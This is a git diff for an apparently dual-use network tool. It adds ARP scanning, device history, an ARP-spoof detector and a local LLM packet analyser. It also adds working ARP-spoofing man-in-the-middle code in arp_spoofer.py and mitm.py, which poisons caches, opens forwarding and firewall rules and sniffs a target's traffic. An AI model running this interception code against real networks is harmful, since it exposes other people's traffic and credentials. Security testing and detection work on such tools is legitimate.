+ QMessageBox.information(self, "Export", "No scan results to export.")
+ return
+
+ path, selected_filter = QFileDialog.getSaveFileName(
+ self,
+ "Export Results",
+ f"phantom_scan_{datetime.now().strftime('%Y%m%d_%H%M%S')}",
+ "JSON Files (*.json);;CSV Files (*.csv)",
+ )
+ if not path:
+ return
+
+ records = [
+ {
+ "ip": ip,
+ "mac": mac,
+ "hostname": hostname,
+ "vendor": dv,
+ "status": self._device_status.get(ip, "seen"),
+ }
+ for ip, mac, hostname, dv, _ in self._last_results
+ ]
+
+ if "csv" in selected_filter.lower() or path.endswith(".csv"):
+ with open(path, "w", newline="", encoding="utf-8") as f:
+ writer = csv.DictWriter(
+ f, fieldnames=["ip", "mac", "hostname", "vendor", "status"]
+ )
+ writer.writeheader()
+ writer.writerows(records)
+ else:
+ with open(path, "w", encoding="utf-8") as f:
+ json.dump(records, f, indent=2)
+
+ QMessageBox.information(
+ self, "Export", f"Saved {len(records)} devices to {path}"
+ )
+
+ # ------------------------------------------------------------------
+ # Quit
+ # ------------------------------------------------------------------
def quit_application(self):
- """Quit the application."""
+ """Disable the quit button and shut down the application."""
self._ui.quit.setEnabled(False)
- #net.disable_ip_forwarding()
- # Stop any running threads safely
- if self.arp_scanner_thread is not None:
+ self._shutdown()
+
+ def closeEvent(self, event): # pylint: disable=invalid-name
+ """Shut down scanner thread when dialog closes."""
+ self._shutdown()
+ super().closeEvent(event)
+
+ def _shutdown(self):
+ if self.arp_scanner_thread is not None and self.arp_scanner_thread.isRunning():
self.arp_scanner_thread.quit()
self.arp_scanner_thread.wait()
- self.close()
+ from PySide6.QtWidgets import QApplication # pylint: disable=E0611
+
+ QApplication.quit()
+
+
+# ---------------------------------------------------------------------------
+# ARP Scanner Thread
+# ---------------------------------------------------------------------------
-class ARPScannerThread(QThread): # pylint: disable=too-few-public-methods
- """ARP scanner"""
- finished = Signal(list) # Final results
- partialResults = Signal(list) # Intermediate results
- progressChanged = Signal(int) # New signal for progress (0-100%)
- def __init__(self, interface, mac_vendor_lookup, timeout=1):
+class ARPScannerThread(QThread): # pylint: disable=too-few-public-methods
+ """ARP scanner — supports parallel scanning and custom CIDR targets."""
+
+ finished = Signal(list)
+ partialResults = Signal(list)
+ progressChanged = Signal(int)
+
+ def __init__(self, interface, mac_vendor_lookup, timeout=1, target_cidr=None):
super().__init__()
self.interface = interface
self.mac_vendor_lookup = mac_vendor_lookup
self.timeout = timeout
- self.is_macos = get_os() == 'mac'
+ self.target_cidr = target_cidr
+ self.is_macos = get_os() == "mac"
self.use_native = self.is_macos and NATIVE_ARP_AVAILABLE
- def _scan_ip_native(self, src_ip, target_ip):
- try:
- result = arpscanner.perform_arp_scan(
- self.interface,
- str(src_ip),
- str(target_ip),
- int(self.timeout * 1000) # Convert to ms
- )
- return target_ip, result
- except Exception as e: # pylint: disable=broad-exception-caught
- print(f"Error scanning {target_ip}: {e}")
- return target_ip, None
-
- def _create_arp_response(self, ip_addr, mac):
- return type('ARPResponse', (), {
- 'psrc': ip_addr,
- 'hwsrc': mac,
- '__str__': lambda self: f"ARP {self.psrc} is-at {self.hwsrc}"
- })()
-
def run(self):
- """Run the ARP scan thread."""
+ """Determine the target network and start the ARP scan."""
src_ip = get_if_addr(self.interface)
- try:
- netmask = netifaces.ifaddresses(self.interface)[netifaces.AF_INET][0]['netmask']
- network_cidr = net.calculate_network_cidr(src_ip, netmask)
- except KeyError:
- self.finished.emit([])
- return
- network = ipaddress.IPv4Network(network_cidr)
+ if self.target_cidr:
+ try:
+ network = ipaddress.IPv4Network(self.target_cidr, strict=False)
+ except ValueError as e:
+ print(f"Invalid target CIDR {self.target_cidr}: {e}")
+ self.finished.emit([])
+ return
+ else:
+ try:
+ netmask = netifaces.ifaddresses(self.interface)[netifaces.AF_INET][0][
+ "netmask"
+ ]
+ network_cidr = net.calculate_network_cidr(src_ip, netmask)
+ network = ipaddress.IPv4Network(network_cidr)
+ except KeyError:
+ self.finished.emit([])
+ return
+
arp_results = self._scan_network(src_ip, network)
self.finished.emit(arp_results)
def _scan_network(self, src_ip, network):
- """Scan the given network and return ARP results."""
hosts = [str(ip) for ip in network.hosts() if str(ip) != src_ip]
if self.use_native:
print("Using native ARP scanner")
return self._run_native_scan(src_ip, hosts)
- print("Using Scapy ARP scanner with progress updates")
+ print(f"Using Scapy ARP scanner — {len(hosts)} hosts")
return self._run_scapy_scan(hosts)
+ # ------------------------------------------------------------------
+ # Native (macOS) scan — sequential, one host at a time
+ # ------------------------------------------------------------------
+
def _run_native_scan(self, src_ip, hosts):
- """Perform native ARP scanning on a list of hosts."""
+ """Scan hosts sequentially using the native C arpscanner extension."""
arp_results = []
total = len(hosts)
for count, ip in enumerate(hosts, start=1):
- target_ip, result = self._scan_ip_native(src_ip, ip)
+ try:
+ result = arpscanner.perform_arp_scan(
+ self.interface,
+ str(src_ip),
+ str(ip),
+ int(self.timeout * 1000),
+ )
+ except Exception as e: # pylint: disable=broad-exception-caught
+ print(f"Error scanning {ip}: {e}")
+ result = None
+
if result:
- device_vendor = self.mac_vendor_lookup.lookup_vendor(result['mac'])
- hostname = net.get_hostname(target_ip)
- arp_response = self._create_arp_response(target_ip, result['mac'])
- arp_results.append(
- (target_ip,
- result['mac'],
- hostname,
- device_vendor,
- arp_response)
- )
+ mac = result["mac"]
+ device_vendor = self.mac_vendor_lookup.lookup_vendor(mac)
+ hostname = net.get_hostname(ip)
+ arp_response = _make_arp_response(ip, mac)
+ arp_results.append((ip, mac, hostname, device_vendor, arp_response))
+
self._update_progress(count, total, arp_results)
return arp_results
+ # ------------------------------------------------------------------
+ # Scapy scan — parallel bulk dispatch
+ # ------------------------------------------------------------------
+
def _run_scapy_scan(self, hosts):
- """Perform Scapy ARP scanning on a list of hosts."""
+ """
+ Split hosts into chunks and scan them concurrently.
+ Each chunk sends a bulk ARP request via srp() to minimise round-trips,
+ then resolves hostnames in parallel.
+ """
+ chunk_size = 254
+ chunks = [hosts[i : i + chunk_size] for i in range(0, len(hosts), chunk_size)]
+ total_chunks = len(chunks)
arp_results = []
- total = len(hosts)
- for count, ip in enumerate(hosts, start=1):
+
+ for chunk_idx, chunk in enumerate(chunks, start=1):
+ pkts = [Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip) for ip in chunk]
try:
- ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
- timeout=self.timeout, verbose=0)
- if ans:
- for _, received in ans:
- ip_addr = received.psrc
- mac = received.hwsrc
- device_vendor = self.mac_vendor_lookup.lookup_vendor(mac)
- hostname = net.get_hostname(ip_addr)
- arp_results.append((ip_addr, mac, hostname, device_vendor, received))
- except Exception as e: # pylint: disable=broad-exception-caught
- print(f"Error scanning {ip}: {e}")
- self._update_progress(count, total, arp_results)
+ # inter=0.5ms between sends, retry=2 for slow/IoT devices,
+ # timeout is per-round wait after the last packet is sent
+ ans, _ = srp(
+ pkts,
+ timeout=self.timeout,
+ iface=self.interface,
+ inter=0.0005,
+ retry=2,
+ verbose=0,
+ )
+ except Exception as e: # pylint: disable=broad-exception-caught
+ print(f"Scapy error on chunk {chunk_idx}: {e}")
+ ans = []
+
+ # Resolve hostnames in parallel for all responding hosts
+ responded = [(rcv.psrc, rcv.hwsrc, rcv) for _, rcv in ans]
+ resolved = self._resolve_parallel(responded)
+ arp_results.extend(resolved)
+
+ # Emit partial results and progress after each chunk
+ self.partialResults.emit(list(arp_results))
+ progress = int((chunk_idx / total_chunks) * 100)
+ self.progressChanged.emit(progress)
+
return arp_results
+ def _resolve_parallel(self, responded: list) -> list:
+ """Resolve hostnames and vendor for a list of (ip, mac, packet) concurrently."""
+ results = []
+
+ def resolve_one(entry):
+ ip, mac, pkt = entry
+ device_vendor = self.mac_vendor_lookup.lookup_vendor(mac)
+ hostname = net.get_hostname(ip)
+ return ip, mac, hostname, device_vendor, pkt
+
+ with concurrent.futures.ThreadPoolExecutor(
+ max_workers=_RESOLVE_WORKERS
+ ) as pool:
+ for result in pool.map(resolve_one, responded):
+ results.append(result)
+
+ return results
+
+ # ------------------------------------------------------------------
+ # Helpers
+ # ------------------------------------------------------------------
+
def _update_progress(self, count, total, arp_results):
- """Update progress and emit partial results every 10 hosts."""
+ """Used only by native scan path (scapy uses chunk-based progress)."""
progress = int((count / total) * 100)
self.progressChanged.emit(progress)
if count % 10 == 0:
- self.partialResults.emit(arp_results)
+ self.partialResults.emit(list(arp_results))
+
+
+def _format_packet(pkt) -> str:
+ """Return a human-readable multi-layer breakdown of a Scapy packet."""
+ lines = []
+ lines.append(f"{'─'*60}")
+ lines.append(f" {pkt.summary()}")
+ lines.append(f"{'─'*60}")
+
+ layer = pkt
+ while layer:
+ name = layer.__class__.__name__
+ lines.append(f"\n[ {name} ]")
+ for field, val in layer.fields.items():
+ # Format bytes as hex, everything else as-is
+ if isinstance(val, bytes):
+ formatted = val.hex(" ") if val else "(empty)"
+ else:
+ formatted = str(val)
+ lines.append(f" {field:<20} {formatted}")
+ # Move to next layer
+ layer = (
+ layer.payload
+ if layer.payload and layer.payload.__class__.__name__ != "NoPayload"
+ else None
+ )
+
+ # Raw payload hex dump if present
+ raw = bytes(pkt)
+ if raw:
+ lines.append(f"\n[ Raw ({len(raw)} bytes) ]")
+ for i in range(0, len(raw), 16):
+ chunk = raw[i : i + 16]
+ hex_part = " ".join(f"{b:02x}" for b in chunk)
+ ascii_part = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
+ lines.append(f" {i:04x} {hex_part:<47} {ascii_part}")
+
+ return "\n".join(lines)
+
+
+def _make_arp_response(ip_addr, mac):
+ return type(
+ "ARPResponse",
+ (),
+ {
+ "psrc": ip_addr,
+ "hwsrc": mac,
+ "__str__": lambda self: f"ARP {self.psrc} is-at {self.hwsrc}",
+ },
+ )()
diff --git a/core/arp_spoofer.py b/core/arp_spoofer.py
old mode 100644
new mode 100755
index e69de29..14499ef
--- a/core/arp_spoofer.py
+++ b/core/arp_spoofer.py
@@ -0,0 +1,75 @@
+"""ARP Spoofer — sends spoofed ARP packets to perform a MITM attack."""
+
+import time
+
+import scapy.all as scapy
+
+
+class ArpSpoofer:
+ """Performs ARP spoofing between a target and gateway."""
+ def __init__(self, target_ip, gateway_ip, interval=4):
+ """
+ Initialize the ARP Spoofer with the target IP and gateway IP.
+ :param target_ip: The IP address of the target.
+ :param gateway_ip: The IP address of the gateway (router).
+ :param interval: The interval between sending spoofing packets (in seconds).
+ """
+ self.target_ip = target_ip
+ self.gateway_ip = gateway_ip
+ self.interval = interval
+
+ def get_mac(self, ip):
+ """Get the MAC address of a device using its IP address."""
+ return scapy.getmacbyip(ip) # pylint: disable=no-member
+
+ def spoof(self, target_ip, spoof_ip):
+ """
+ Send an ARP spoofing packet to the target.
+
+ :param target_ip: The IP address to send the spoofed ARP response to.
+ :param spoof_ip: The IP address the target should believe the packet is from.
+ """
+ packet = scapy.ARP( # pylint: disable=no-member
+ op=2, pdst=target_ip, hwdst=self.get_mac(target_ip), psrc=spoof_ip
+ )
+ scapy.send(packet, verbose=False)
+
+ def restore(self, destination_ip, source_ip):
+ """
+ Restore the normal ARP table by sending the correct ARP response.
+ :param destination_ip: The IP address whose ARP table we want to fix.
+ :param source_ip: The real IP address associated with this IP.
+ """
+ destination_mac = self.get_mac(destination_ip)
+ source_mac = self.get_mac(source_ip)
+ packet = scapy.ARP( # pylint: disable=no-member
+ op=2,
+ pdst=destination_ip,
+ hwdst=destination_mac,
+ psrc=source_ip,
+ hwsrc=source_mac,
+ )
+ scapy.send(packet, verbose=False)
+
+ def start(self):
+ """Start the ARP spoofing attack by continuously sending spoofed packets."""
+ try:
+ print(
+ f"[*] Starting ARP spoofing. Target: {self.target_ip}, Gateway: {self.gateway_ip}"
+ )
+ while True:
+ self.spoof(
+ self.target_ip, self.gateway_ip
+ ) # Spoof the target to think we are the gateway
+ self.spoof(
+ self.gateway_ip, self.target_ip
+ ) # Spoof the gateway to think we are the target
+ print(
+ f"[*] Sent spoof packets to {self.target_ip} and {self.gateway_ip}"
+ )
+ time.sleep(self.interval)
+ except KeyboardInterrupt:
+ print("\n[!] Detected CTRL+C ... Restoring ARP tables.")
+ self.restore(self.target_ip, self.gateway_ip)
+ self.restore(self.gateway_ip, self.target_ip)
+ print("[*] ARP tables restored. Exiting...")
diff --git a/core/db.py b/core/db.py
new file mode 100644
index 0000000..c0e8461
--- /dev/null
+++ b/core/db.py
@@ -0,0 +1,106 @@
+"""
+Database module for persisting device scan history and detecting changes.
+"""
+
+import os
+import sqlite3
+from datetime import datetime
+
+DB_PATH = os.path.join(os.path.dirname(os.path.dirname(__file__)), "devices.db")
+
+
+def _connect():
+ conn = sqlite3.connect(DB_PATH)
+ conn.row_factory = sqlite3.Row
+ return conn
+
+
+def init_db():
+ """Create tables if they don't exist."""
+ with _connect() as conn:
+ conn.execute("""
+ CREATE TABLE IF NOT EXISTS devices (
+ id INTEGER PRIMARY KEY AUTOINCREMENT,
+ ip_address TEXT NOT NULL,
+ mac_address TEXT NOT NULL,
+ hostname TEXT,
+ vendor TEXT,
+ first_seen TEXT NOT NULL,
+ last_seen TEXT NOT NULL,
+ UNIQUE(ip_address, mac_address)
+ )
+ """)
+ conn.execute("""
+ CREATE TABLE IF NOT EXISTS mac_history (
+ id INTEGER PRIMARY KEY AUTOINCREMENT,
+ ip_address TEXT NOT NULL,
+ mac_address TEXT NOT NULL,
+ seen_at TEXT NOT NULL
+ )
+ """)
+ conn.commit()
+
+
+def upsert_device(ip_address, mac_address, hostname, vendor):
+ """
+ Insert or update a device record.
+ Returns a string tag: 'new', 'mac_changed', or 'seen'.
+ """
+ now = datetime.utcnow().isoformat()
+ with _connect() as conn:
+ existing = conn.execute(
+ "SELECT mac_address FROM devices WHERE ip_address = ?", (ip_address,)
+ ).fetchone()
+
+ if existing is None:
+ conn.execute(
+ "INSERT INTO devices"
+ " (ip_address, mac_address, hostname, vendor, first_seen, last_seen)"
+ " VALUES (?, ?, ?, ?, ?, ?)",
+ (ip_address, mac_address, hostname, vendor, now, now),
+ )
+ conn.execute(
+ "INSERT INTO mac_history (ip_address, mac_address, seen_at) VALUES (?, ?, ?)",
+ (ip_address, mac_address, now),
+ )
+ conn.commit()
+ return "new"
+
+ if existing["mac_address"].lower() != mac_address.lower():
+ conn.execute(
+ """UPDATE devices SET mac_address=?, hostname=?, vendor=?, last_seen=?
+ WHERE ip_address=?""",
+ (mac_address, hostname, vendor, now, ip_address),
+ )
+ conn.execute(
+ "INSERT INTO mac_history (ip_address, mac_address, seen_at) VALUES (?, ?, ?)",
+ (ip_address, mac_address, now),
+ )
+ conn.commit()
+ return "mac_changed"
+
+ conn.execute(
+ "UPDATE devices SET hostname=?, vendor=?, last_seen=? WHERE ip_address=?",
+ (hostname, vendor, now, ip_address),
+ )
+ conn.commit()
+ return "seen"
+
+
+def get_all_devices():
+ """Return all known devices as a list of dicts."""
+ with _connect() as conn:
+ rows = conn.execute(
+ "SELECT ip_address, mac_address, hostname, vendor, first_seen, last_seen FROM devices"
+ ).fetchall()
+ return [dict(r) for r in rows]
+
+
+def get_mac_history(ip_address):
+ """Return the MAC history for a given IP (for spoofing audit trail)."""
+ with _connect() as conn:
+ rows = conn.execute(
+ "SELECT mac_address, seen_at FROM mac_history WHERE ip_address = ? ORDER BY seen_at",
+ (ip_address,),
+ ).fetchall()
+ return [dict(r) for r in rows]
diff --git a/core/mitm.py b/core/mitm.py
new file mode 100644
index 0000000..c7972d9
--- /dev/null
+++ b/core/mitm.py
@@ -0,0 +1,293 @@
+"""
+MITM orchestrator — ARP spoof a target + sniff its traffic.
+"""
+
+import re
+import subprocess
+import time
+
+import scapy.all as scapy
+from PySide6.QtCore import QThread, Signal # pylint: disable=E0611
+from scapy.all import ARP, Ether, sniff # pylint: disable=E0611
+
+from core.platform import get_os
+
+_PF_PASS_RULE = "pass all\n"
+
+
+def _pf_enable_forwarding():
+ """Load a minimal pf ruleset that passes all traffic for forwarding."""
+ try:
+ # Back up the current ruleset so we can restore it later
+ result = subprocess.run(
+ ["pfctl", "-s", "rules"], capture_output=True, text=True, check=False
+ )
+ _pf_enable_forwarding._saved_rules = ( # pylint: disable=protected-access
+ result.stdout if result.returncode == 0 else ""
+ )
+
+ # Load a pass-all ruleset
+ subprocess.run(
+ ["pfctl", "-f", "-"],
+ input=_PF_PASS_RULE,
+ text=True,
+ check=True,
+ capture_output=True,
+ )
+ # Enable pf in case it was disabled
+ subprocess.run(["pfctl", "-e"], capture_output=True, check=False)
+ print("[MITM] pf set to pass all (forwarding enabled)")
+ except subprocess.CalledProcessError as e:
+ print(f"[MITM] pf setup failed (run as root/sudo?): {e}")
+
+
+_pf_enable_forwarding._saved_rules = "" # pylint: disable=protected-access
+
+
+def _pf_disable_forwarding():
+ """Restore the pf ruleset that was active before MITM started."""
+ saved = _pf_enable_forwarding._saved_rules # pylint: disable=protected-access
+ try:
+ if saved.strip():
+ subprocess.run(
+ ["pfctl", "-f", "-"],
+ input=saved,
+ text=True,
+ capture_output=True,
+ check=False,
+ )
+ print("[MITM] pf ruleset restored")
+ else:
+ # Nothing was saved — just flush rules and disable
+ subprocess.run(["pfctl", "-F", "rules"], capture_output=True, check=False)
+ print("[MITM] pf rules flushed")
+ except subprocess.CalledProcessError as e:
+ print(f"[MITM] pf restore failed: {e}")
+
+
+def _set_ip_forwarding(enable: bool) -> bool:
+ """Enable or disable IP forwarding so intercepted packets are relayed.
+ On Linux also manages the iptables FORWARD chain.
+ Returns True on success, False on failure."""
+ val = "1" if enable else "0"
+ os_name = get_os()
+ try:
+ if os_name == "linux":
+ subprocess.run(
+ ["sysctl", "-w", f"net.ipv4.ip_forward={val}"],
+ check=True,
+ capture_output=True,
+ )
+ # Verify it actually took effect
+ result = subprocess.check_output(
+ ["sysctl", "-n", "net.ipv4.ip_forward"], text=True
+ )
+ if result.strip() != val:
+ print(
+ f"[MITM] ip_forward verification failed: expected {val}, got {result.strip()}"
+ )
+ return False
+ # Ensure iptables FORWARD chain accepts traffic
+ if enable:
+ subprocess.run(
+ ["iptables", "-P", "FORWARD", "ACCEPT"],
+ check=True,
+ capture_output=True,
+ )
+ else:
+ subprocess.run(
+ ["iptables", "-P", "FORWARD", "DROP"],
+ capture_output=True,
+ check=False,
+ ) # best-effort restore, not fatal
+ elif os_name == "mac":
+ subprocess.run(
+ ["/usr/sbin/sysctl", "-w", f"net.inet.ip.forwarding={val}"],
+ check=True,
+ capture_output=True,
+ )
+ result = subprocess.check_output(
+ ["/usr/sbin/sysctl", "-n", "net.inet.ip.forwarding"], text=True
+ )
+ if result.strip() != val:
+ print(
+ f"[MITM] ip_forward verification failed: expected {val}, got {result.strip()}"
+ )
+ return False
+ # Ensure pf passes forwarded traffic
+ if enable:
+ _pf_enable_forwarding()
+ else:
+ _pf_disable_forwarding()
+ return True
+ except subprocess.CalledProcessError as e:
+ print(f"[MITM] ip_forward toggle failed (run as root/sudo?): {e}")
+ return False
+
+
+class MitmThread(QThread):
+ """ARP-spoof a target/gateway pair and sniff the intercepted traffic."""
+
+ packetCaptured = Signal(object) # raw scapy packet
+ statusChanged = Signal(str)
+ stopped = Signal() # emitted when fully cleaned up
+
+ def __init__(self, interface, target_ip, gateway_ip, spoof_interval=2, parent=None):
+ super().__init__(parent)
+ self.interface = interface
+ self.target_ip = target_ip
+ self.gateway_ip = gateway_ip
+ self.spoof_interval = spoof_interval
+ self._running = False
+ self._target_mac = None
+ self._gateway_mac = None
+
+ def stop(self):
+ """Signal the thread to stop spoofing and clean up."""
+ self._running = False # thread will clean up and emit stopped
+
+ def run(self):
+ """Start the MITM attack: resolve MACs, enable forwarding, spoof and sniff."""
+ self._running = True
+
+ self._target_mac = _resolve_mac(self.target_ip, self.interface)
+ self._gateway_mac = _resolve_mac(self.gateway_ip, self.interface)
+
+ if not self._target_mac or not self._gateway_mac:
+ self.statusChanged.emit(
+ f"Could not resolve MACs for {self.target_ip} / {self.gateway_ip}"
+ )
+ self._running = False
+ self.stopped.emit()
+ return
+
+ if not _set_ip_forwarding(True):
+ self.statusChanged.emit(
+ "WARNING: IP forwarding could not be enabled — "
+ "traffic will be intercepted but NOT forwarded (target loses internet). "
+ "Run phantom as root/sudo."
+ )
+ else:
+ self.statusChanged.emit(
+ f"MITM started — target: {self.target_ip} ({self._target_mac}), "
+ f"gateway: {self.gateway_ip} ({self._gateway_mac})"
+ )
+
+ sniffer = _SnifferThread(self.interface, self.target_ip)
+ sniffer.packetCaptured.connect(self.packetCaptured)
+ sniffer.start()
+
+ # Spoof loop — 100 ms ticks so stop() responds quickly
+ while self._running:
+ self._spoof(self.target_ip, self._target_mac, self.gateway_ip)
+ self._spoof(self.gateway_ip, self._gateway_mac, self.target_ip)
+ for _ in range(self.spoof_interval * 10):
+ if not self._running:
+ break
+ time.sleep(0.1)
+
+ sniffer.stop()
+ sniffer.wait(3000) # max 3 s — scapy sniff has ~1 s timeout built in
+ self._restore()
+ _set_ip_forwarding(False)
+ self.statusChanged.emit("MITM stopped — ARP tables restored.")
+ self.stopped.emit()
+
+ def _spoof(self, target_ip, target_mac, spoof_ip):
+ pkt = Ether(dst=target_mac) / ARP(
+ op=2,
+ pdst=target_ip,
+ hwdst=target_mac,
+ psrc=spoof_ip,
+ )
+ scapy.sendp(pkt, iface=self.interface, verbose=False)
+
+ def _restore(self):
+ for _ in range(4):
+ scapy.sendp(
+ Ether(dst=self._target_mac)
+ / ARP(
+ op=2,
+ pdst=self.target_ip,
+ hwdst=self._target_mac,
+ psrc=self.gateway_ip,
+ hwsrc=self._gateway_mac,
+ ),
+ iface=self.interface,
+ verbose=False,
+ )
+ scapy.sendp(
+ Ether(dst=self._gateway_mac)
+ / ARP(
+ op=2,
+ pdst=self.gateway_ip,
+ hwdst=self._gateway_mac,
+ psrc=self.target_ip,
+ hwsrc=self._target_mac,
+ ),
+ iface=self.interface,
+ verbose=False,
+ )
+ time.sleep(0.2)
+
+
+def _resolve_mac(ip: str, interface: str) -> str | None:
+ """
+ Resolve MAC for an IP.
+ 1. Check kernel ARP cache (only REACHABLE/STALE entries, not FAILED)
+ 2. Fall back to explicit Scapy ARP probe via srp()
+ """
+ try:
+ out = subprocess.check_output(["ip", "neigh", "show", ip], text=True)
+ # Only trust entries that actually have a MAC (exclude FAILED/INCOMPLETE)
+ m = re.search(
+ r"lladdr\s+([0-9a-f:]{17}).*(?:REACHABLE|STALE|DELAY|PROBE)",
+ out,
+ re.IGNORECASE,
+ )
+ if m:
+ return m.group(1)
+ except Exception: # pylint: disable=broad-exception-caught
+ pass
+
+ # Explicit ARP probe — more reliable than getmacbyip() on wifi
+ from scapy.all import srp # pylint: disable=E0611
+
+ ans, _ = srp(
+ Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
+ iface=interface,
+ timeout=3,
+ retry=3,
+ verbose=False,
+ )
+ if ans:
+ return ans[0][1].hwsrc
+ return None
+
+
+class _SnifferThread(QThread):
+ packetCaptured = Signal(object) # raw scapy packet
+
+ def __init__(self, interface, target_ip, parent=None):
+ super().__init__(parent)
+ self.interface = interface
+ self.target_ip = target_ip
+ self._running = False
+
+ def stop(self):
+ """Signal the sniffer to stop."""
+ self._running = False
+
+ def run(self):
+ """Sniff packets from/to the target IP until stopped."""
+ self._running = True
+ bpf = f"host {self.target_ip} and not arp"
+ while self._running:
+ sniff(
+ iface=self.interface,
+ filter=bpf,
+ prn=self.packetCaptured.emit,
+ stop_filter=lambda _: not self._running,
+ store=False,
+ timeout=1,
+ )
diff --git a/core/ollama_analyst.py b/core/ollama_analyst.py
new file mode 100644
index 0000000..2b4e16b
--- /dev/null
+++ b/core/ollama_analyst.py
@@ -0,0 +1,97 @@
+"""
+Ollama integration — streams LLM analysis of a captured packet.
+"""
+
+import json
+
+import requests
+from PySide6.QtCore import QThread, Signal # pylint: disable=E0611
+
+OLLAMA_URL = "http://localhost:11434/api/generate"
+DEFAULT_MODEL = "llama3.2:1b"
+
+SYSTEM_PROMPT = """You are an IoT security researcher specialising in vulnerability discovery
+on embedded and smart devices.
+You will be given a decoded network packet captured during a MITM session against an IoT or specialised device.
+Analyse it and report concisely:
+- Device type / firmware fingerprint clues (banner, UA, protocol quirks)
+- Protocol and service in use — flag any plaintext, unencrypted, or legacy protocols (HTTP, Telnet, MQTT without TLS, CoAP, mDNS, UPnP, etc.)
+- Credentials, API keys, tokens, or sensitive data visible in the clear
+- Known CVE patterns or exploit primitives (default creds, unauthenticated endpoints, buffer-overflow indicators, command injection vectors)
+- Insecure update mechanisms or unverified firmware fetches
+- Unusual beaconing, C2 indicators, or data exfiltration patterns
+- One-line risk rating: Low / Medium / High / Critical — with a short justification
+Be specific and technical. No preamble. If nothing suspicious is found, say so briefly."""
+
+
+class OllamaThread(QThread):
+ """Streams an LLM analysis of a packet. Emits token by token."""
+
+ token = Signal(str) # streamed text fragment
+ finished = Signal()
+ error = Signal(str)
+
+ def __init__(
+ self,
+ packet_text: str,
+ user_context: str = "",
+ device_vendor: str = "",
+ hostname: str = "",
+ model: str = DEFAULT_MODEL,
+ parent=None,
+ ):
+ super().__init__(parent)
+ self.packet_text = packet_text
+ self.user_context = user_context
+ self.device_vendor = device_vendor
+ self.hostname = hostname
+ self.model = model
+
+ def run(self):
+ """Stream LLM analysis of the packet to the token signal."""
+ device_section = ""
+ if self.device_vendor or self.hostname:
+ device_section = "\nDevice under analysis:"
+ if self.hostname:
+ device_section += f"\n Hostname : {self.hostname}"
+ if self.device_vendor:
+ device_section += f"\n Vendor : {self.device_vendor}"
+ device_section += "\n"
+
+ context_section = (
+ f"\nAdditional context from analyst:\n{self.user_context}\n"
+ if self.user_context
+ else ""
+ )
+ prompt = (
+ f"{SYSTEM_PROMPT}\n{device_section}{context_section}\nPacket:\n{self.packet_text}"
+ )
+ payload = {
+ "model": self.model,
+ "prompt": prompt,
+ "stream": True,
+ }
+ try:
+ with requests.post(
+ OLLAMA_URL, json=payload, stream=True, timeout=(5, 300)
+ ) as resp:
+ resp.raise_for_status()
+ for line in resp.iter_lines():
+ if not line:
+ continue
+ chunk = json.loads(line)
+ if chunk.get("response"):
+ self.token.emit(chunk["response"])
+ if chunk.get("done"):
+ break
+ except requests.exceptions.ConnectionError:
+ self.error.emit("Ollama not running — start it with: ollama serve")
+ except requests.exceptions.ReadTimeout:
+ self.error.emit(
+ f"Ollama timed out — model '{self.model}' is too slow or not loaded. "
+ "Try: ollama pull " + self.model
+ )
+ except Exception as e: # pylint: disable=broad-exception-caught
+ self.error.emit(str(e))
+ finally:
+ self.finished.emit()
diff --git a/core/sniffer.py b/core/sniffer.py
index 74a2c8b..903eec6 100644
--- a/core/sniffer.py
+++ b/core/sniffer.py
@@ -1,6 +1,6 @@
"""Module Sniffer"""
-from PyQt6.QtCore import QObject, pyqtSignal as Signal # pylint: disable=E0611
+from PySide6.QtCore import QObject, Signal # pylint: disable=E0611
import scapy.all as scapy
diff --git a/core/spoof_detector.py b/core/spoof_detector.py
new file mode 100644
index 0000000..559d0fc
--- /dev/null
+++ b/core/spoof_detector.py
@@ -0,0 +1,106 @@
+"""
+ARP Spoofing Detector — passive detection via ARP traffic analysis.
+
+Detects:
+ - Same IP answered from two different MACs in one session (conflicting binding)
+ - Gateway MAC change (classic MITM indicator)
+ - Gratuitous ARP replies changing a known binding
+"""
+
+import netifaces
+from PySide6.QtCore import QThread, Signal # pylint: disable=E0611
+from scapy.all import ARP, sniff # pylint: disable=E0611
+
+
+class SpoofDetector(QThread):
+ """
+ Background thread that sniffs ARP traffic and emits alerts when
+ suspicious behaviour is detected.
+
+ Signals:
+ alert(str) — human-readable alert message
+ """
+
+ alert = Signal(str)
+
+ def __init__(self, interface, parent=None):
+ super().__init__(parent)
+ self.interface = interface
+ self._running = False
+
+ # ip -> set of MACs seen this session
+ self._ip_mac_table: dict[str, set] = {}
+
+ # Capture gateway MAC at startup for change detection
+ self._gateway_ip = self._get_gateway_ip()
+ self._gateway_mac: str | None = None
+
+ # ------------------------------------------------------------------
+ # Public API
+ # ------------------------------------------------------------------
+
+ def stop(self):
+ """Signal the detector thread to stop sniffing."""
+ self._running = False
+
+ def seed_known_devices(self, devices: list[tuple[str, str]]):
+ """Pre-populate the table from a previous scan result (ip, mac) pairs."""
+ for ip, mac in devices:
+ self._ip_mac_table.setdefault(ip, set()).add(mac.lower())
+
+ # ------------------------------------------------------------------
+ # QThread
+ # ------------------------------------------------------------------
+
+ def run(self):
+ """Sniff ARP packets and check for spoofing indicators."""
+ self._running = True
+ sniff(
+ iface=self.interface,
+ filter="arp",
+ prn=self._process_packet,
+ stop_filter=lambda _: not self._running,
+ store=False,
+ )
+
+ # ------------------------------------------------------------------
+ # Internal helpers
+ # ------------------------------------------------------------------
+
+ @staticmethod
+ def _get_gateway_ip() -> str | None:
+ try:
+ return netifaces.gateways()["default"][netifaces.AF_INET][0]
+ except (KeyError, IndexError):
+ return None
+
+ def _process_packet(self, pkt):
+ if not pkt.haslayer(ARP):
+ return
+
+ arp = pkt[ARP]
+ ip = arp.psrc
+ mac = arp.hwsrc.lower()
+
+ if not ip or ip == "0.0.0.0":
+ return
+
+ known_macs = self._ip_mac_table.get(ip)
+
+ if known_macs is None:
+ # First time we see this IP — just record it
+ self._ip_mac_table[ip] = {mac}
+ return
+
+ if mac not in known_macs:
+ # New MAC for a known IP — potential spoofing
+ old_macs = ", ".join(known_macs)
+ msg = f"[SPOOF ALERT] IP {ip} changed MAC: was {old_macs}, now {mac}"
+ self.alert.emit(msg)
+ known_macs.add(mac)
+
+ # Special case: gateway MAC changed
+ if ip == self._gateway_ip:
+ self.alert.emit(
+ f"[CRITICAL] Gateway {ip} MAC changed to {mac} — possible MITM attack!"
+ )
